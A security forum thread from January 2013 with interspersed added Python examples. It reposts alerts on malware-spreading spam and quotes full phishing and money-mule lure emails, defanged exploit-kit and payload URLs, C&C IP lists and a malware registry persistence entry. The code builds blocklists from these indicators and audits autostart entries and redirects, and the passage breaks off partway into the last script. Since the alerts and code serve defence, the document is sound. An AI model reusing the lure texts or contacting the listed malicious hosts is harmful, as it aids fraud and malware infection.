
SPAM frauds, fakes, and other MALWARE deliveries...


2072 replies to this topic

#856 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 15 January 2013 - 07:48 AM

FYI...

Fake Southwest Airlines Giveaway...
- http://www.gfi.com/b...high-once-more/
Jan 15, 2013 - "A fresh fake Southwest Airlines free ticket scam campaign has made its way onto Facebook again, this time as an event invite spammed within the network.
Southwest Airlines is giving two tickets to any destination within the United States! To grab yours, just visit [URL here]
Based on the bit.ly data of the URL, it is highly likely that this scam has been going around since the 14th of this month. Once users click the shortened URL, they are redirected to a page where, purportedly, they can claim their free two tickets to the US. The page claims that the offer is only available for a certain period, suggesting that interested parties must act now or else miss this opportunity... Users are advised to ignore this Facebook event invite if they receive it and notify the creator of the invite that their post must be deleted."
(Screenshots available at the gfi URL above.)
___

xree .ru and the persistent pharma SPAM
- http://blog.dynamoo....harma-spam.html
15 Jan 2013 - "No doubt sent out by the same crew who are pushing malware, this pharma spam seems to have hit new highs.
Date: Tue, 15 Jan 2013 05:35:04 -0500 (EST)
From: Account Mail Sender [invoice @erlas .hu]
Subject: Invoice confirmation
Hello. Thank you for your order.
We greatly appreciate your time and look forward to a mutually rewarding business relationship with our company well into the future.
At present, our records indicate that we have an order or several orders outstanding that we have not received confirmation from you. If you have any questions regarding your account, please contact us.
We will be happy to answer any questions that you may have.
Your Customer Login Page
Customer login: [redacted]
Thanking you in advance for your attention to this matter.
Sincerely, Justa Dayton


The link in the email goes through a legitimate hacked site to [donotclick]xree .ru/?contactus but then it redirects to a seemingly random fake pharma site. However, the redirect only works if you have the referrer set correctly.
The landing sites are on:
199.59.56.59 (Hostwinds, Australia)
209.236.67.220 (WestHost Inc, US)
I can't find any malware on these sites, but you may as well block them if you can as they seem to have a lot of domains on them..."
(Long list of domains available at the dynamoo URL above.)
__

Verizon Wireless SPAM / dmssmgf .ru
- http://blog.dynamoo....-dmssmgfru.html
15 Jan - "This fake Verizon Wireless spam leads to malware on dmssmgf .ru:
From: Friendster Games [mailto:friendstergames @friendster .com]
Sent: 14 January 2013 21:47
Subject: Verizon Wireless
IMPORTANT ACCOUNT NOTE FROM VERIZON WIRELESS.
Your acknowledgment message is issued.
Your account No. ending in 2308
Dear Client
For your accommodation, your confirmation letter can be found in the Account Documentation desk of My Verizon.
Please browse your informational message for more details relating to your new transaction.
Open Information Message
In addition, in My Verizon you will find links to information about your device & services that may be helpfull if you looking for answers.
Thank you for joining us. My Verizon is laso works 24 hours 7 days a week to assist you with:
• Viewing your utilization
• Upgrade your tariff
• Manage Account Members
• Pay for your bill
• And much, much more...
2013 Verizon Wireless
Verizon Wireless | One Verizon Way Mail Code: 113WVC | Basking Ridge, MI 87325
We respect your privacy. Please browse our policy for more information


The malicious payload is on [donotclick]dmssmgf .ru:8080/forum/links/column.php (report here) hosted on:
81.31.47.124 (Master Internet s.r.o / Petr Bydzovsky, Czech Republic)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)
The following IPs and domains are all connected:
81.31.47.124
91.224.135.20
212.112.207.15
dekamerionka .ru
dmssmgf .ru
dmpsonthh .ru
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru
"

:ph34r: <_<

Edited by AplusWebMaster, 15 January 2013 - 03:43 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.



#857 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 16 January 2013 - 10:23 AM

FYI...

Fake EFTPS, BBB and Fed Reserve SPAM
- http://www.gfi.com/b...l-reserve-spam/
Jan 16, 2013 - "... the AV Labs have captured and recorded* a number of notable email threats last week — generally spam related to malware...
- Fake BBB Complaints Spam...
- Fake EFTPS Spam...
- FedMail ACH Spam... leads to Cridex
Users are advised to mark the above email threats as spam if they’re found in their inbox and then/or simply delete them."
(Screenshots available at the gfi URL above.)
* http://gfisoftware.tumblr.com/
___

Fake American Express SPAM / dozakialko .ru
- http://blog.dynamoo....zakialkoru.html
16 Jan 2013 - "This fake AmEx spam leads to malware on dozakialko .ru:
Sent: 16 January 2013 02:22
Subject: American Express Alert: Your Transaction is Aborted
Your Wed, 16 Jan 2013 01:22:07 -0100 Incoming Transfer is Terminated
Valued, $5203
Your American Express Card account retired ZUE36213 with amount of 5070 USD.
Transaction Time:Wed, 16 Jan 2013 01:22:07 -0100
Payment Due Date:Wed, 16 Jan 2013 01:22:07 -0100
One small way to help the environment - get paperless statements
Review billing
statement
Issue a payment
Change notifications
options
You currently reading the LIMITED DATA version of the Statement-Ready Information.
Switch to the DETAILED DATA version.
Thank you for your Cardmembership.
Sincerely,
American Express Information center


The malicious payload is at [donotclick]dozakialko .ru:8080/forum/links/column.php (report here*) hosted on the following IPs:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)
Plain list of IPs and related domains for copy-and-pasting:
89.111.176.125
91.224.135.20
212.112.207.15
dekamerionka .ru
dmssmgf .ru
dmpsonthh .ru
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru
dozakialko .ru
..."
* http://wepawet.isecl...9...147&type=js
___

Fake EFTPS emails lead to BlackHole Exploit Kit
- http://blog.webroot....le-exploit-kit/
Jan 16, 2013 - "Cybercriminals are currently mass mailing tens of thousands of emails, impersonating the EFTPS (Electronic Federal Tax Payment System), in an attempt to trick its users into clicking on exploits and malware serving malicious links found in the emails...
Sample screenshot of the spamvertised email:
> https://webrootblog....nt_declined.png
... Upon successful client-side exploitation, the campaign drops MD5: d35a52d639468c2c4c857e6629b3f6f0 * ... Worm:Win32/Cridex.E.
Once executed, the sample phones back to the following command and control servers:
109.230.229.250:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA
163.23.107.65:8080
174.142.68.239:8080
81.93.250.157:8080
180.235.150.72:8080
109.230.229.70:8080
95.142.167.193:8080
217.65.100.41:8080
188.120.226.30:8080
193.68.82.68:8080
203.217.147.52:8080
210.56.23.100:8080
221.143.48.6:8080
182.237.17.180:8080
59.90.221.6:8080
64.76.19.236:8080
69.64.89.82:8080
173.201.177.77:8080
78.28.120.32:8080
174.120.86.115:8080
74.207.237.170:8080
77.58.193.43:8080
94.20.30.91:8080
84.22.100.108:8080
87.229.26.138:8080
97.74.113.229:8080

We’ve already seen the same pseudo-random C&C characters used in... previously profiled malicious campaigns..."
(More detail at the webroot URL above.)
* https://www.virustot...71830/analysis/
File name: calc.exe
Detection ratio: 25/46
Analysis date: 2013-01-14
___

Fake ADP SPAM / teamrobotmusic .net
- http://blog.dynamoo....otmusicnet.html
16 Jan 2013 - "This fake ADP spam leads to malware on teamrobotmusic .net:
Date: Wed, 16 Jan 2013 18:36:25 +0200 [11:36:25 EST]
From: "notify @adp .com" [notify @adp .com]
Subject: ADP Speedy Information
ADP Speedy Communication
[redacted]
Reference ID: 14580
Dear ADP Client January, 16 2012
Your Money Transfer Statement(s) have been uploaded to the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please see the following details:
• Please note that your bank account will be charged-off within 1 business day for the value(s) specified on the Record(s).
•Please don't reply to this message. auomatic informational system unable to accept incoming email. Please Contact your ADP Benefits Expert.
This email was sent to acting users in your company that access ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 14580


The malicious payload is on [donotclick]teamrobotmusic .net/detects/bits_remember_confident.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP has been used in a few attacks recently and should be blocked if you can..."

:ph34r: :ph34r: <_<

Edited by AplusWebMaster, 16 January 2013 - 11:06 AM.

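The IP, domain and C&C lists quoted in posts #856 and #857 above (the Dynamoo "plain list for copy-and-pasting" and the Webroot Cridex C&C list) are defanged: a space before the TLD, a [donotclick] prefix, hxxp in place of http, and hoster annotations in brackets. They cannot be dropped straight into a blocklist as they stand. The Python script below is an added example, not code from the forum post or from the Dynamoo or Webroot blogs: it refangs those indicator strings into clean hosts, builds a blocklist from them and matches it against a few proxy log lines. The indicator strings are copied from the posts; the log format and the log lines are constructed for the demonstration and are not from any real system.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Indicator strings as they appear in the posts above (defanged).
RAW_INDICATORS = [
    "[donotclick]dmssmgf .ru:8080/forum/links/column.php",
    "81.31.47.124 (Master Internet s.r.o / Petr Bydzovsky, Czech Republic)",
    "91.224.135.20 (Proservis UAB, Lithuania)",
    "212.112.207.15 (ip4 GmbH, Germany)",
    "dekamerionka .ru",
    "dozakialko .ru",
    "109.230.229.250:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA",   # Cridex C&C from the Webroot list
    "163.23.107.65:8080",
    "[donotclick]teamrobotmusic .net/detects/bits_remember_confident.php",
    "222.238.109.66 (Hanaro Telecom, Korea)",
]

# Constructed proxy log lines: timestamp, client, method, target, status. Not from the posts.
LOG_LINES = [
    "2013-01-16T10:01:02 10.0.0.12 GET http://dmssmgf.ru:8080/forum/links/column.php 200",
    "2013-01-16T10:01:05 10.0.0.12 CONNECT 163.23.107.65:8080 200",
    "2013-01-16T10:02:11 10.0.0.15 GET http://www.example.com/index.html 200",
    "2013-01-16T10:03:40 10.0.0.19 GET http://teamrobotmusic.net/detects/bits_remember_confident.php 200",
]
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<target>\S+)\s+(?P<status>\d+)$"
)


def refang(text):
    """Undo the defanging conventions used in the posts."""
    t = text.strip()
    t = re.sub(r"\[donotclick\]", "", t, flags=re.I)                     # [donotclick]host -> host
    t = re.sub(r"\s*\(.*\)\s*$", "", t)                                  # drop "(hoster, country)"
    t = re.sub(r"^h[xt]+p(s?)\s*:\s*//", r"http\1://", t, flags=re.I)   # "hxxp ://" -> "http://"
    t = re.sub(r"\s*\.\s*", ".", t)                                      # "dmssmgf .ru" -> "dmssmgf.ru"
    return t


def parse_indicator(raw):
    """Split a refanged indicator into host, port and path; is_ip says whether the host is an address."""
    t = refang(raw)
    if "://" not in t:
        t = "http://" + t            # urlsplit needs a scheme to locate the host part
    parts = urlsplit(t)
    host = parts.hostname.lower()
    try:
        ipaddress.ip_address(host)
        is_ip = True
    except ValueError:
        is_ip = False
    return {"host": host, "port": parts.port, "path": parts.path, "is_ip": is_ip}


def build_blocklist(raws):
    """Set of hosts (domains and IP addresses) to block."""
    return {parse_indicator(r)["host"] for r in raws}


def match_log(lines, blocklist):
    """Return (client, host, target) for every log line whose target host is on the blocklist."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        host = urlsplit(target if "://" in target else "http://" + target).hostname
        if host and host.lower() in blocklist:
            hits.append((m.group("client"), host.lower(), target))
    return hits


if __name__ == "__main__":
    bl = build_blocklist(RAW_INDICATORS)
    for client, host, target in match_log(LOG_LINES, bl):
        print(f"{client} contacted blocked host {host}: {target}")
```

The blocklist is keyed on host only, so a C&C entry such as 163.23.107.65:8080 also catches the same address on another port; if you want port-precise matching, keep the `port` field from parse_indicator and compare it as well.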


#858 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 17 January 2013 - 07:28 AM

FYI...

Fake Vodafone emails serve malware
- http://blog.webroot....-serve-malware/
Jan 17, 2013 - "Over the past 24 hours, cybercriminals resumed spamvertising fake Vodafone MMS themed emails, in an attempt to trick the company’s customers into executing the malicious attachment found in these emails...
Sample screenshot of the spamvertised email:
> https://webrootblog....mms_malware.png
Detection rate for the malicious executable:
MD5: bafebf4cdf640520e6266eb05b55d7c5 * ... Trojan-Downloader.Win32.Andromeda.pfu.
Once executed, the sample creates the following Registry values:
\Software\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched -> “C:\Documents and Settings\All Users\svchost.exe“
It also copies itself to other locations, and injects code in other processes. We intercepted a similar campaign last year, indicating that, depending on the campaign in question, cybercriminals are not always interested in popping up on everyone’s radar with persistent and systematic spamvertising of campaigns using identical templates. Instead, some of their campaigns tend to have a rather short-lived life cycle. We believe this practice is entirely based on the click-through rates for malicious URLs and actual statistics on the number of people that executed the malicious samples..."
* https://www.virustot...sis/1358366804/
File name: MMS.jpg.exe
Detection ratio: 21/46
Analysis date: 2013-01-16
___

Fake KeyBank "secure message" virus
- http://blog.dynamoo....ved-secure.html
17 Jan 2013 - "This fake KeyBank spam has an attachment called securedoc.zip which contains a malicious executable file named securedoc.exe.
Date: Thu, 17 Jan 2013 11:16:54 -0500 [11:16:54 EST]
From: "Antoine_Pearce @KeyBank .com" [Antoine_Pearce @KeyBank .com]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, SECUREDOC. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions about Key's e-mail encryption service, please contact technical support at 888.764.7941.
First time users - will need to register after opening the attachment.
Help - https ://mailsafe.keybank .com/websafe/help?topic=RegEnvelope
About IronPort Encryption - https ://mailsafe.keybank .com/websafe/about


VirusTotal results are not good*. The ThreatExpert report for the malware can be found here**. The malware attempts to call home to:
173.230.139.4 (Linode, US)
192.155.83.208 (Linode, US)
..and download additional components from
[donotclick]ib-blaschke .de/4kzWUR.exe
[donotclick]chris-zukunftswege .de/DynThR8.exe
[donotclick]blueyellowbook .com/Cct1Kk58.exe ..."
* https://www.virustot...sis/1358440323/
File name: securedoc.exe
Detection ratio: 5/46
Analysis date: 2013-01-17
** http://www.threatexp...90f1317f1b68610
___

Fake Wire Transfer SPAM / dfudont .ru
- http://blog.dynamoo....ation-spam.html
17 Jan 2013 - "This spam leads to malware on dfudont .ru:
Date: Fri, 18 Jan 2013 08:58:56 +0600 [21:58:56 EST]
From: SUMMERDnIKYkatTerry @aol .com
Subject: Fwd: Wire Transfer Confirmation (FED_59983S76643)
Dear Bank Account Operator,
WIRE TRANSFER: FED86180794682707910
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.


The malicious payload is at [donotclick]dfudont .ru:8080/forum/links/column.php hosted on:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)
These IPs have been used in several malware attacks recently - blocking them is a good idea. The following malicious domains are also present on these servers:
dekamerionka .ru
dmssmgf .ru
dmpsonthh .ru
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
damagalko .ru
dozakialko .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru
dfudont .ru
Update: there is also a fake Sendspace spam sending visitors to the same payload...
Date: Thu, 17 Jan 2013 03:03:55 +0430
From: Badoo [noreply @badoo .com]
Subject: You have been sent a file (Filename: [redacted]_N584581.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]_N390.pdf, (973.39 KB) waiting to be downloaded at sendspace.(It was sent by JOHNETTE ).
You can use the following link to retrieve your file:
Download
Thank you,
Sendspace, the best free file sharing service.


:ph34r: <_<

Edited by AplusWebMaster, 17 January 2013 - 04:34 PM.

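The Vodafone item in post #858 quotes the persistence the Andromeda sample sets up: a Run value named SunJavaUpdateSched whose target is a file called svchost.exe in the "All Users" profile directory, that is, a Windows binary name running from a user-writable location. The Python check below is an added example, not code from the forum post or from Webroot. It audits Run-key entries for exactly that pattern (a system binary name outside the system directories, or any target in a user-writable directory). The entries are constructed for the demonstration: the first reproduces the value quoted in the post, the others are made up for contrast; on a real host the data would come from a registry export or an autostart listing tool rather than an inline list.

```python
import ntpath
import re

RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"   # the key named in the write-up

# Lower-cased prefixes of the directories where Windows' own service binaries live.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Windows binary names that malware borrows to blend in (svchost.exe in the write-up).
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe"}
# Substrings of user-writable locations that no legitimate autostart should run from.
USER_WRITABLE = (r"c:\documents and settings\all users", r"c:\users\public",
                 r"\appdata\local\temp", r"c:\windows\temp")

# Constructed Run-key entries (name, value). The first reproduces the value quoted in the post;
# the rest are made up: a benign entry with the same name, a temp-directory updater, an IME helper.
ENTRIES = [
    ("SunJavaUpdateSched", r'"C:\Documents and Settings\All Users\svchost.exe"'),
    ("SunJavaUpdateSched", r'"C:\Program Files\Common Files\Java\Java Update\jusched.exe"'),
    ("Updater", r"C:\Users\bob\AppData\Local\Temp\update.exe /silent"),
    ("ctfmon", r"C:\WINDOWS\system32\ctfmon.exe"),
]


def extract_path(value):
    """Pull the executable path out of a Run value: a "quoted path", else the first token ending in .exe."""
    v = value.strip()
    m = re.match(r'^"([^"]+)"', v)
    if m:
        return m.group(1)
    m = re.match(r"^(.*?\.exe)\b", v, flags=re.I)
    return m.group(1) if m else v


def audit_entry(name, value):
    """Return the reasons an entry looks suspicious (empty list when it looks normal)."""
    path = extract_path(value)
    low = path.lower()
    base = ntpath.basename(low)
    reasons = []
    if base in SYSTEM_NAMES and not low.startswith(SYSTEM_DIRS):
        reasons.append(f"{base} is a Windows binary name but runs from outside the system directories")
    if any(d in low for d in USER_WRITABLE):
        reasons.append("target lives in a user-writable directory")
    return reasons


def audit(entries):
    """(name, path, reasons) for every entry that raised at least one reason."""
    findings = []
    for name, value in entries:
        reasons = audit_entry(name, value)
        if reasons:
            findings.append((name, extract_path(value), reasons))
    return findings


if __name__ == "__main__":
    for name, path, reasons in audit(ENTRIES):
        print(f"{RUN_KEY}\\{name} -> {path}")
        for r in reasons:
            print(f"    {r}")
```

The name check alone is not enough: the value name here borrows a real Java updater's name, so it is the target path, not the value name, that gives the entry away.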


#859 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 17 January 2013 - 07:41 PM

FYI...

Fake Java update is malware
- http://blog.trendmic...java-0-day-fix/
Jan 17, 2013 - "... We were alerted to reports of a malware that poses as Java Update 11 created by an unknown publisher. The said fake update in question is javaupdate11.jar (detected as JAVA_DLOADER.NTW), which contains javaupdate11.class that downloads and executes malicious files up1.exe and up2.exe (both detected as BKDR_ANDROM.NTW). Once executed, this backdoor connects to a remote server that enables a possible attacker to take control of the infected system. Users can get this fake update by visiting the malicious website, {BLOCKED}currencyreport .com/cybercrime-suspect-arrested/javaupdate11.jar.
> http://blog.trendmic...update_site.gif
Though the dropped malware does not exploit CVE-2012-3174 or any Java-related vulnerability, the bad guys behind this threat are clearly piggybacking on the Java zero-day incident and users’ fears. The use of fake software updates is an old social engineering tactic. This is not the first time that cybercriminals took advantage of software updates. Last year, we reported about a malware disguised as a Yahoo! Messenger, which we found in time for Yahoo!’s announcement of its update for Messenger..."

:ph34r: :ph34r: <_<



#860 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 18 January 2013 - 08:52 AM

FYI...

Fake "A.R.T. Logistics" job offer
- http://blog.dynamoo....-job-offer.html
18 Jan 2013 - "There may be various genuine companies in the world with a name similar to "A.R.T. Logistics Industrial & Trading Ltd", but this job offer does not come from a genuine company. Instead it is trying to recruit people for money laundering ("money mule") jobs and parcel reshipping scams (a way of laundering stolen goods). Note that the scammers aren't even consistent in the way they name the company.
From: ART LOGISTICS INDUSTRIAL AND TRADING LTD [info@sender .org]
Reply-To: artlogisticsltd @yahoo .com.ph
Date: 18 January 2013 07:49
Subject: A.R.T. LOGISTICS INDUSTRIAL & TRADING LIMITED
A.R.T LOGISTIC INDUSTRIAL & TRADING LIMITED
Export & Import Agent‚ Service Company.
46/F Tower 1, Metroplaza 223 Hing Fong Road,
Kwai Chung New Territories, Hong Kong.
A.R.T. Logistics mainly provides services to customers in Russia, Kazakhstan and Hong Kong. We provide: - Air freight - Sea freight (FCL & LCL to EU, Russia, Kazakhstan & Central Asia) - Rail freight - Road Freight (FTL & LTL to any place in Russia, Kazakhstan and Central Asia) Our company has worked in Russia, Kazakhstan & Central Asia since 2005 and has wide experience of transport such as airfreight, container and rail.
We are presently shifting our base to North America and we have collective customers in the United State & Canada but We find it difficult establishing payments modalities with this customers and we don't intend loosing our customers. We are searching for a front line representative as intermediary by establishing a medium of getting payments from this customers in Canada & America by making payments through you to us. Do contact us for more information at this e-mail: (artlogis @e-mail .ua).
Subject to your satisfaction with the front line representative offer, you will be made our foreign payment receiving officer in your region and you will deduct 10% of every transactions made through you for your services as our Financial Representative.
Sincerely,
Yasar Feng Xu
A.R.T LOGISTIC INDUSTRIAL & TRADING LIMITED
N.B Reply to: artlogisticsltd @yahoo .com.ph


In this case, the spam originates from 31.186.186.2 [mail.zsmirotice .cz]. Avoid!"
___

Shylock banking trojan travels by Skype
- http://h-online.com/-1786928
18 Jan 2013 - "The banking trojan Shylock has found itself a new distribution channel – Skype. The security firm CSIS* recently discovered a Shylock module called "msg.gsm" trying to use the VoIP software to infect other computers. If successful, the malware then sets up a typical backdoor. The module tries to send Shylock as a file, bypassing warnings from the Skype software by confirming them itself and cleaning any generated messages from the Skype history. Once the trojan has been transferred it connects to a command and control server which can ask it to install a VNC server allowing remote control of the computer, get cookies, inject HTTP code into web sites being browsed, spread Shylock over removable drives, or upload files to a server. The epicenter of infections is, according to CSIS, the UK... At the time of writing, the most recent VirusTotal test** shows 15 of the engines now detecting it..."
* https://www.csis.dk/en/csis/blog/3811/

** https://www.virustot...ec842/analysis/
File name: 8fbeb78b06985c3188562e2f1b82d57d
Detection ratio: 15/46
Analysis date: 2013-01-18
___

Fake LinkedIn SPAM / shininghill .net
- http://blog.dynamoo....inghillnet.html
18 Jan 2013 - "This fake LinkedIn spam leads to malware on shininghill .net:
Date: Fri, 18 Jan 2013 18:16:32 +0200
From: "LinkedIn" [announce@e .linkedin .com]
Subject: LinkedIn Information service message
LinkedIn
REMINDERS
Invite notifications:
? From MiaDiaz ( Your renter)
PENDING EVENTS
∙ There are a total of 2 messages awaiting your response. Enter your InBox right now.
Don't want to get email info letters? Change your message settings.
LinkedIn values your privacy. Not once has LinkedIn made your e-mail address available to any another LinkedIn member without your permission. © 2013, LinkedIn Corporation.


The malicious payload is at [donotclick]shininghill.net/detects/solved-surely-considerable.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP address has been used in several recent attacks and should be blocked if you can.
The following domains appear to be active on this IP address, all should be considered to be malicious..."
(More detail at the dynamoo URL above.)
___

Fake ADP SPAM / dopaminko .ru
- http://blog.dynamoo....opaminkoru.html
18 Jan 2013 - "This fake ADP spam leads to malware on dopaminko .ru:
Date: Fri, 18 Jan 2013 09:08:38 -0500
From: "service @paypal .com" [service @paypal .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 544043911
Fri, 18 Jan 2013 09:08:38 -0500
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.lexdirect.adp .com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 206179035
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.


The malicious payload is at [donotclick]dopaminko .ru:8080/forum/links/column.php hosted on the following familiar IP addresses:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)
These following malicious domains appear to be active on these servers..."
(More detail at the dynamoo URL above.)

:ph34r: <_<

Edited by AplusWebMaster, 18 January 2013 - 03:43 PM.



#861 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 21 January 2013 - 08:03 AM

FYI...

Phishers target UnionBank of the Philippines clients
- http://www.gfi.com/b...ppines-clients/
Jan 21, 2013 - "We have been alerted by an ongoing phishing campaign that targets clients and online banking users of the UnionBank of the Philippines. The phishing URL, which is being sent to users in the form of spam, is found hosted on a legitimate but compromised Russian domain. We have also found previous records of the said domain hosting a different phishing page a few days ago. The spam entices users to visit a certain URL to “reactivate” their account... This phishing page has closely mimicked the look or template of legitimate pages where users can enter their sensitive banking information... Once users have entered and submitted their information, a confirmation window pops up and then users are redirected to the legitimate UnionBank website... Most UnionBank users have their PayPal accounts tied to their banking accounts, so it is very important to steer clear from emails claiming to be from the bank that ask for banking details... better call them and inquire about the email you receive just to be sure. It also pays to consult this Anti-Fraud and Anti-Phishing Guidelines page* from UnionBank for guidance on how to identify phishing pages from the real ones."
* http://www.unionbank...o...&Itemid=472
(Screenshots available at the gfi URL above.)
___

Malware Masks as Latest Java Update
- http://www.gfi.com/b...st-java-update/
Jan 21, 2013 - "... security experts have discovered a new zero-day, critical flaw on Java not so long ago, which is already integrated into popular exploit kits, such as Blackhole, Redkit, Cool and Nuclear Pack. The said flaw, once exploited, is said to allow remote code execution on a target system without authentication from the user. This, of course, gives malware files the upper hand if users visit sites/URLs where they are hosted. Immediately after the vulnerability was found, Oracle released its patch. Despite this speedy response from the company, many security experts have already begun advising users to just forget the patch and disable Java in their browsers. Perhaps some users have already made the move of disabling Java entirely, or perhaps some users have opted still to apply the patch. Whether you belong to the former group or the latter, let this be our reminder to you: Please make sure that you’re downloading the patch straight from the Oracle website* and nowhere else because it’s highly likely that what you may be installing onto your system is malware**..."
* http://java.com/en/download/index.jsp

** http://blog.trendmic...java-0-day-fix/
___

Kenyan Judiciary (judiciary .go.ke) hacked to serve malware
- http://blog.dynamoo....oke-hacked.html
21 Jan 2013 - "The Judiciary of the Republic of Kenya has a mission to deliver justice fairly, impartially and expeditiously, promote equal access to justice, and advance local jurisprudence by upholding the rule of law. Unfortunately, it has also been hacked to serve up malware.
> https://lh3.ggpht.co...ciary-go-ke.png
The site has been compromised to serve up an exploit kit being promoted by spam email. There's a redirector at [donotclick]www.judiciary .go.ke /wlc.htm attempting to redirect visitors to [donotclick]dfudont .ru:8080/forum/links/column.php where there's a nasty exploit kit.
> https://lh3.ggpht.co...iary-go-ke2.png
Of course, most visitors to the judiciary .go.ke site won't see that particular exploit. But if someone can create an arbitrary HTML page on that server, then they pretty much have the run of the whole thing and they can do what they like. So the question might be.. what else has been compromised? Hmm."
___

LinkedIn spam / prepadav .com
- http://blog.dynamoo....repadavcom.html
21 Jan 2013 - "This fake LinkedIn spam leads to malware on prepadav .com:
From: LinkedIn [mailto :news@ linkedin .com]
Sent: 21 January 2013 16:21
Subject: LinkedIn Reminder from your co-worker
LinkedIn
REMINDERS
Invitation reminders:
From CooperWright ( Your employer)
PENDING LETTERS
• There are a total of 2 messages awaiting your action. Acces to your InBox now.
Don't wish to receive email notifications? Adjust your letters settings.
LinkedIn respect your privacy. In no circumstances has LinkedIn made your e-mail acceptable to any other LinkedIn user without your allowance. © 2013, LinkedIn Corporation.


The malicious payload is at [donotclick]prepadav .com/detects/region_applied-depending.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP has been used in several malware attacks recently and it should be blocked if you can..."
___

Fake Intuit SPAM / danadala .ru
- http://blog.dynamoo....danadalaru.html
21 Jan 2013 - "This fake Intuit spam leads to malware on danadala .ru:
Date: Mon, 21 Jan 2013 04:45:31 -0300
From: RylieBouthillette @hotmail .com
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Mon, 21 Jan 2013 04:45:31 -0300.
Finances would be gone away from below account # ending in 8134 on Mon, 21 Jan 2013 04:45:31 -0300
amount to be seceded: 5670 USD
Paychecks would be procrastinated to your personnel accounts on: Mon, 21 Jan 2013 04:45:31 -0300
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services


The malicious payload is at [donotclick]danadala .ru:8080/forum/links/column.php hosted on a familiar bunch of IPs that have been used in several recent attacks:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)..."

:ph34r: :ph34r: <_<

Edited by AplusWebMaster, 21 January 2013 - 05:12 PM.

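The Kenyan Judiciary item in post #861 describes the typical shape of a compromised legitimate site: a page on the site's own host (wlc.htm) whose only job is to send visitors to an exploit-kit URL on an unrelated host. A site owner can find such pages by scanning their own HTML for redirects and frames whose destination host is not their own. The Python scanner below is an added example, not code from the forum post or from the Dynamoo write-up: it pulls meta-refresh targets, iframe/frame sources and `location = "..."` assignments in inline scripts out of a page and reports the ones that point off-site. The sample HTML is constructed; the post does not say what form the real wlc.htm took, only where it redirected, and the destination host here is the one the post names.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

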